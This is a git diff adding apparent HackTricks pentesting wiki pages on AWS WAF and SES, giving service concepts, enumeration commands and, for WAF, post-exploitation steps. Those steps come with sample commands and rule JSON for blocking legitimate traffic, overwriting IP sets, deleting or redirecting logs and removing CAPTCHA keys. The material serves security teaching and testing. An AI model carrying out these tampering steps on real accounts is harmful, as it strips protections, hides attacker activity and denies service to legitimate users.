+Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it.
+
+#### Rule
+
+A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules:
+
+1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests.
+2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**.
+
+#### Managed Rules
+
+AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities.
+
+#### IP Set
+
+An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules.
+
+#### Regex Pattern Set
+
+A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters.
+
+#### Lock Token
+
+A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously.
+
+#### API Keys
+
+API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations.
+
+* **Example**: Integration of the CAPTCHA API.
+
+#### Permission Policy
+
+A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations.
+
+#### Scope
+
+The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution.
+
+* **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located.
+* **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served.
+
+### Key features
+
+#### Monitoring Criteria (Conditions)
+
+**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**.
+
+Each AWS account can configure:
+
+* **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased).
+* **100 rules** and **50 Web ACLs**.
+* A maximum of **5 rate-based rules**.
+* A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer.
+
+#### Rule actions
+
+Actions are assigned to each rule, with options being:
+
+* **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer.
+* **Block**: The request is terminated immediately.
+* **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block.
+* **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges.
+
+If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence:
+
+1. Allow Whitelisted IPs.
+2. Block Blacklisted IPs.
+3. Block requests matching any detrimental signatures.
+
+#### CloudWatch Integration
+
+AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks.
+
+### Enumeration
+
+In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia):
+
+* CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` .
+* API and SDKs - For all calls, use the Region endpoint us-east-1.
+
+In order to interact with regional services, you should specify the region:
+
+* Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2`
+
+```bash
+# Web ACLs #
+
+## Retrieve a list of web access control lists (Web ACLs) available in your AWS account
+aws wafv2 list-web-acls --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve details about the specified Web ACL
+aws wafv2 get-web-acl --name <value> --id <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+
+## Retrieve a list of resources associated with a specific web access control list (Web ACL)
+aws wafv2 list-resources-for-web-acl --web-acl-arn <value> # Additional permissions needed depending on the protected resource type: cognito-idp:ListResourcesForWebACL, ec2:DescribeVerifiedAccessInstanceWebAclAssociations or apprunner:ListAssociatedServicesForWebAcl
+## Retrieve the Web ACL associated with the specified AWS resource
+aws wafv2 get-web-acl-for-resource --resource-arn <arn> # Additional permissions needed depending on the protected resource type: cognito-idp:GetWebACLForResource, ec2:GetVerifiedAccessInstanceWebAcl, wafv2:GetWebACL or apprunner:DescribeWebAclForService
+ 
+# Rule groups #
+
+## List of the rule groups available in your AWS account
+aws wafv2 list-rule-groups --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve the details of a specific rule group
+aws wafv2 get-rule-group [--name <value>] [--id <value>] [--arn <value>] [--scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>]
+## Retrieve the IAM policy attached to the specified rule group
+aws wafv2 get-permission-policy --resource-arn <rule-group-arn> # Just the owner of the Rule Group can do this operation
+
+# Managed rule groups (by AWS or by a third-party) #
+
+## List the managed rule groups that are available
+aws wafv2 list-available-managed-rule-groups --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## List the available versions of the specified managed rule group
+aws wafv2 list-available-managed-rule-group-versions --vendor-name <value> --name <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve high-level information about a specific managed rule group
+aws wafv2 describe-managed-rule-group --vendor-name <value> --name <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--version-name <value>]
+## Retrieve high-level information about all managed rule groups
+aws wafv2 describe-all-managed-products --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve high-level information about all managed rule groups from a specific vendor
+aws wafv2 describe-managed-products-by-vendor --vendor-name <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+
+# IP sets #
+
+## List the IP sets that are available in your AWS account
+aws wafv2 list-ip-sets --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve the specific IP set
+aws wafv2 get-ip-set --name <value> --id <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve the keys that are currently being managed by a rate-based rule.
+aws wafv2 get-rate-based-statement-managed-keys --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>\
+ --web-acl-name <value> --web-acl-id <value> --rule-name <value> [--rule-group-rule-name <value>]
+
+# Regex pattern sets #
+
+## List all the regex pattern sets that you manage
+aws wafv2 list-regex-pattern-sets --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieves the specified regex pattern sets
+aws wafv2 get-regex-pattern-set --name <value> --id <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+
+# API Keys #
+
+## List API keys for the specified scope
+aws wafv2 list-api-keys --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+## Retrieve decrypted API key
+aws wafv2 get-decrypted-api-key --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> --api-key <value>
+
+# Logs #
+
+## List of logging configurations (storage location of the logs)
+aws wafv2 list-logging-configurations --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--log-scope <value>]
+## Retrieve the logging configuration settings associated with a specific web ACL 
+aws wafv2 get-logging-configuration --resource-arn <value> [--log-scope <CUSTOMER | SECURITY_LAKE>] [--log-type <value>]
+
+# Miscelaneous #
+
+## Retrieve a list of the tags associated to the specified resource
+aws wafv2 list-tags-for-resource resource-arn <value>
+
+## Retrieve a sample of web requests that match a specified rule within a WebACL during a specified time range
+aws wafv2 get-sampled-requests --web-acl-arn <value> --rule-metric-name <value> --time-window <value> --max-items <1-500> --scope <value> 
+
+## Obtains the web ACL capacity unit (WCU) requirements for a specified scope and ruleset
+aws wafv2 check-capacity --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> --rules <value>
+
+## List of available releases for the AWS WAFv2 mobile SDK
+aws wafv2 list-mobile-sdk-releases --platform <IOS | ANDROID>
+## Retrieves information for the specified mobile SDK release
+aws wafv2 get-mobile-sdk-release --platform <value> --release-version <value>
+
+```
+
+### Post Exploitation / Bypass
+
+{% hint style="success" %}
+From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs.
+
+However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF.
+{% endhint %}
+
+In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource.
+
+#### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`**
+
+An attacker would be able to compromise the security of the affected resource by:
+
+* Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service.
+* Updating rule groups, being able to modify its actions for example from **Block** to **Allow**.
+* Deleting rule groups that provide critical security measures.
+
+```bash
+# Create Rule Group
+aws wafv2 create-rule-group --name <value> --capacity <value> --visibility-config <value> \
+--scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--description <value>]
+# Update Rule Group
+aws wafv2 update-rule-group --name <value> --id <value> --visibility-config <value> --lock-token <value>\
+ --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--description <value>]
+# Delete Rule Group
+aws wafv2 delete-rule-group --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+```
+
+The following examples shows a rule group that would block legitimate traffic from specific IP addresses:
+
+```bash
+aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json
+```
+
+The **rule.json** file would look like:
+
+```json
+[
+    {
+        "Name":"BlockLegitimateIPsRule",
+        "Priority":0,
+        "Statement": {
+                "IPSetReferenceStatement": {
+                    "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+                }
+            },
+        "Action":{
+            "Block":{}
+        },
+        "VisibilityConfig":{
+            "SampledRequestsEnabled":false,
+            "CloudWatchMetricsEnabled":false,
+            "MetricName":"BlockLegitimateIPsRule"
+        }
+    }
+]
+```
+
+**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks.
+
+#### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`**
+
+With these permissions, an attacker would be able to:
+
+* Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service.
+* Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests.
+* Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks.
+
+{% hint style="info" %}
+You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false.
+{% endhint %}
+
+```bash
+# Create Web ACL
+aws wafv2 create-web-acl --name <value> --default-action <value> --visibility-config <value> \
+--scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--captcha-config <value>] [--description <value>]
+# Update Web ACL
+aws wafv2 update-web-acl --name <value> --id <value> --default-action <value> --visibility-config <value> --lock-token <value>\
+--scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--captcha-config <value>] [--description <value>]
+# Delete Web ACL
+aws wafv2 delete-web-acl --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+```
+
+The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS.
+
+**Original Web ACL**:
+
+```json
+{
+    "WebACL": {
+        "Name": "AllowLegitimateIPsWebACL",
+        "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+        "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+        "DefaultAction": {
+            "Allow": {}
+        },
+        "Description": "",
+        "Rules": [
+            {
+                "Name": "AllowLegitimateIPsRule",
+                "Priority": 0,
+                "Statement": {
+                    "IPSetReferenceStatement": {
+                        "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+                    }
+                },
+                "Action": {
+                    "Allow": {}
+                },
+                "VisibilityConfig": {
+                    "SampledRequestsEnabled": false,
+                    "CloudWatchMetricsEnabled": false,
+                    "MetricName": "AllowLegitimateIPsRule"
+                }
+            }
+        ],
+        "VisibilityConfig": {
+            "SampledRequestsEnabled": false,
+            "CloudWatchMetricsEnabled": false,
+            "MetricName": "AllowLegitimateIPsWebACL"
+        },
+        "Capacity": 1,
+        "ManagedByFirewallManager": false,
+        "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:"
+    },
+    "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+
+```
+
+Command to update the Web ACL:
+
+```json
+aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1
+```
+
+The **rule.json** file would look like:
+
+```json
+[
+    {
+        "Name": "BlockLegitimateIPsRule",
+        "Priority": 0,
+        "Statement": {
+            "IPSetReferenceStatement": {
+                "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+            }
+        },
+        "Action": {
+            "Block": {}
+        },
+        "VisibilityConfig": {
+            "SampledRequestsEnabled": false,
+            "CloudWatchMetricsEnabled": false,
+            "MetricName": "BlockLegitimateIPRule"
+        }
+    }
+]
+```
+
+**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks.
+
+#### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`**
+
+The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection.
+
+The additional permissions would be needed depending on the protected resource type:
+
+* **Associate**
+  * apigateway:SetWebACL
+  * apprunner:AssociateWebAcl
+  * appsync:SetWebACL
+  * cognito-idp:AssociateWebACL
+  * ec2:AssociateVerifiedAccessInstanceWebAcl
+  * elasticloadbalancing:SetWebAcl
+* **Disassociate**
+  * apigateway:SetWebACL
+  * apprunner:DisassociateWebAcl
+  * appsync:SetWebACL
+  * cognito-idp:DisassociateWebACL
+  * ec2:DisassociateVerifiedAccessInstanceWebAcl
+  * elasticloadbalancing:SetWebAcl
+
+```bash
+# Associate
+aws wafv2 associate-web-acl --web-acl-arn <value> --resource-arn <value>
+# Disassociate
+aws wafv2 disassociate-web-acl --resource-arn <value>
+```
+
+**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF.
+
+#### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`**
+
+An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources.
+
+```bash
+# Create IP set
+aws wafv2 create-ip-set --name <value> --ip-address-version <IPV4 | IPV6> --addresses <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+# Update IP set
+aws wafv2 update-ip-set --name <value> --id <value> --addresses <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+# Delete IP set
+aws wafv2 delete-ip-set --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> 
+```
+
+The following example shows how to **overwrite the existing IP set by the desired IP set**:
+
+```bash
+aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 
+```
+
+**Potential Impact**: Unauthorized access and block of legitimate traffic.
+
+#### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`**
+
+An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns.
+
+* Creating new regex patterns would help an attacker to allow harmful content
+* Updating the existing patterns, an attacker would to bypass security rules
+* Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures.
+
+```bash
+# Create regex pattern set
+aws wafv2 create-regex-pattern-set --name <value> --regular-expression-list <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--description <value>] 
+# Update regex pattern set
+aws wafv2 update-regex-pattern-set --name <value> --id <value> --regular-expression-list <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
+# Delete regex pattern set
+aws wafv2 delete-regex-pattern-set --name <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> --id <value> --lock-token <value>
+```
+
+**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF.
+
+#### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`**
+
+An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control.
+
+During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination:
+
+* **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group.
+* **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket.
+* **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream.
+
+{% hint style="info" %}
+It is possible to define only one logging destination per web ACL.
+{% endhint %}
+
+```bash
+# Put logging configuration
+aws wafv2 put-logging-configuration --logging-configuration <value>
+# Delete logging configuration
+aws wafv2 delete-logging-configuration --resource-arn <value> [--log-scope <CUSTOMER | SECURITY_LAKE>] [--log-type <value>]
+```
+
+**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments.
+
+#### **`wafv2:DeleteAPIKey`**
+
+An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource.
+
+```bash
+# Delete API key
+aws wafv2 delete-api-key --api-key <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> 
+```
+
+**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft.
+
+#### **`wafv2:TagResource`, `wafv2:UntagResource`**
+
+An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations.
+
+```bash
+# Tag
+aws wafv2 tag-resource --resource-arn <value> --tags <value>
+# Untag
+aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
+```
+
+**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption.
+
+## References
+
+* [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/)
+* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
new file mode 100644
index 0000000000..bc219d0c6a
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
@@ -0,0 +1,156 @@
+# AWS - SES Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes.
+
+You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails).
+
+### SMTP User
+
+It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as:
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "ses:SendRawEmail",
+      "Resource": "*"
+    }
+  ]
+}
+```
+
+Then, gather the **API key and secret** of the user and run:
+
+```bash
+git clone https://github.com/lisenet/ses-smtp-converter.git
+cd ./ses-smtp-converter
+chmod u+x ./ses-smtp-conv.sh
+./ses-smtp-conv.sh <AccessKeyId> <SecretAccessKey>
+```
+
+It's also possible to do this from the AWS console web.
+
+### Enumeration
+
+{% hint style="warning" %}
+Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two.
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Get info about the SES account
+aws sesv2 get-account
+aws ses get-account-sending-enabled # Check if enabled
+
+# Get registered domains and email addresses (identities)
+aws ses list-identities
+aws sesv2 list-email-identities
+aws sesv2 get-email-identity --email-identity <identity> #Get at once all the attributes
+
+# Get Resource Policies applied in the identity
+aws ses list-identity-policies --identity <identity>
+aws ses get-identity-policies --identity <identity> --policy-names <policy>
+aws sesv2 get-email-identity-policies --email-identity <identity>
+
+# Get attributes of the identity
+## Check if verified
+aws ses get-identity-verification-attributes --identities <identity>
+## DKIM settings, relevant for identities that are domains not emails
+aws ses get-identity-dkim-attributes --identities <identity>
+## Get what happnes if the send mail from the identity fails
+aws ses get-identity-mail-from-domain-attributes --identities <identity>
+## otifications attributes
+aws ses get-identity-notification-attributes --identities <identity>
+
+# Get email templates
+aws ses list-templates
+aws ses get-template --template-name <name>
+aws sesv2 list-email-templates
+aws sesv2 get-email-template --template-name <name>
+
+# Get custom verification email templates
+## This is the email sent when an identity is verified, it can be customized
+aws ses list-custom-verification-email-templates
+aws sesv2 list-custom-verification-email-templates
+aws ses get-custom-verification-email-template --template-name <name>
+aws sesv2 get-custom-verification-email-template --template-name <name>
+
+# Get receipt rule sets
+## Receipt rules indicate how to handle incoming mail by executing an ordered list of actions
+aws ses list-receipt-rule-sets
+aws ses describe-receipt-rule-set --rule-set-name <name>
+aws ses describe-receipt-rule-set --rule-set-name <name> --rule-name <name>
+## Metadata and receipt rules for the receipt rule set that is currently active
+aws ses describe-active-receipt-rule-set
+
+# Get suppressed destinations
+aws sesv2 list-suppressed-destinations
+aws sesv2 get-suppressed-destination --email-address <email>
+
+# Get configuration sets
+## These are set of rules applied to the identities related to the configuration set
+aws ses list-configuration-sets
+aws sesv2 list-configuration-sets
+aws ses describe-configuration-set --configuration-set-name <name> --configuration-set-attribute-names eventDestinations trackingOptions deliveryOptions reputationOptions
+aws sesv2 get-configuration-set --configuration-set-name <name>
+aws sesv2 get-configuration-set-event-destinations --configuration-set-name <name>
+
+# Get Contacts list
+aws sesv2 list-contact-lists
+aws sesv2 list-contacts --contact-list-name <name>
+aws sesv2 get-contact-list --contact-list-name <name>
+aws sesv2 get-contact --contact-list-name <name> --email-address <name>
+
+# Private IPs
+aws sesv2 list-dedicated-ip-pools
+aws sesv2 get-dedicated-ip-pool --pool-name <name>
+aws sesv2 get-dedicated-ips --pool-name <name> #Only valid if ScalingMode is Standard
+aws sesv2 get-dedicated-ip --ip <ip>
+
+# Misc
+## Get send quota
+aws ses get-send-quota
+## Get statistics
+aws ses get-send-statistics
+```
+{% endcode %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-ses-post-exploitation.md" %}
+[aws-ses-post-exploitation.md](../aws-post-exploitation/aws-ses-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
new file mode 100644
index 0000000000..2c3753a360
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
@@ -0,0 +1,106 @@
+# AWS - SNS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
